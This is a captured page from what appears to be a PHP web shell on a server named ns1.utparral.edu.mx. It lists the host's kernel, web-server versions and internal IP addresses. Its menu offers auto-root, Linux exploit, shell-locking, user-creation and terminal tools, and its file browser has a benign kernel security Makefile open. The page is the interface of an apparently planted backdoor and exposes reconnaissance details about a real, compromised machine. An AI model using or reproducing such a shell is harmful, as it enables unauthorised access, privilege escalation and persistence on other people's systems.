Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
usr /
src /
linux-hwe-6.8-headers-6.8.0-87 /
security /
[ HOME SHELL ]
Name
Size
Permission
Action
apparmor
[ DIR ]
drwxr-xr-x
bpf
[ DIR ]
drwxr-xr-x
integrity
[ DIR ]
drwxr-xr-x
keys
[ DIR ]
drwxr-xr-x
landlock
[ DIR ]
drwxr-xr-x
loadpin
[ DIR ]
drwxr-xr-x
lockdown
[ DIR ]
drwxr-xr-x
safesetid
[ DIR ]
drwxr-xr-x
selinux
[ DIR ]
drwxr-xr-x
smack
[ DIR ]
drwxr-xr-x
tomoyo
[ DIR ]
drwxr-xr-x
yama
[ DIR ]
drwxr-xr-x
Kconfig
10.58
KB
-rw-r--r--
Kconfig.hardening
15.06
KB
-rw-r--r--
Makefile
936
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile
# SPDX-License-Identifier: GPL-2.0 # # Makefile for the kernel security code # obj-$(CONFIG_KEYS) += keys/ # always enable default capabilities obj-y += commoncap.o obj-$(CONFIG_SECURITY) += lsm_syscalls.o obj-$(CONFIG_MMU) += min_addr.o # Object file lists obj-$(CONFIG_SECURITY) += security.o obj-$(CONFIG_SECURITYFS) += inode.o obj-$(CONFIG_SECURITY_SELINUX) += selinux/ obj-$(CONFIG_SECURITY_SMACK) += smack/ obj-$(CONFIG_SECURITY) += lsm_audit.o obj-$(CONFIG_SECURITY_TOMOYO) += tomoyo/ obj-$(CONFIG_SECURITY_APPARMOR) += apparmor/ obj-$(CONFIG_SECURITY_YAMA) += yama/ obj-$(CONFIG_SECURITY_LOADPIN) += loadpin/ obj-$(CONFIG_SECURITY_SAFESETID) += safesetid/ obj-$(CONFIG_SECURITY_LOCKDOWN_LSM) += lockdown/ obj-$(CONFIG_CGROUPS) += device_cgroup.o obj-$(CONFIG_BPF_LSM) += bpf/ obj-$(CONFIG_SECURITY_LANDLOCK) += landlock/ # Object integrity file lists obj-$(CONFIG_INTEGRITY) += integrity/
Close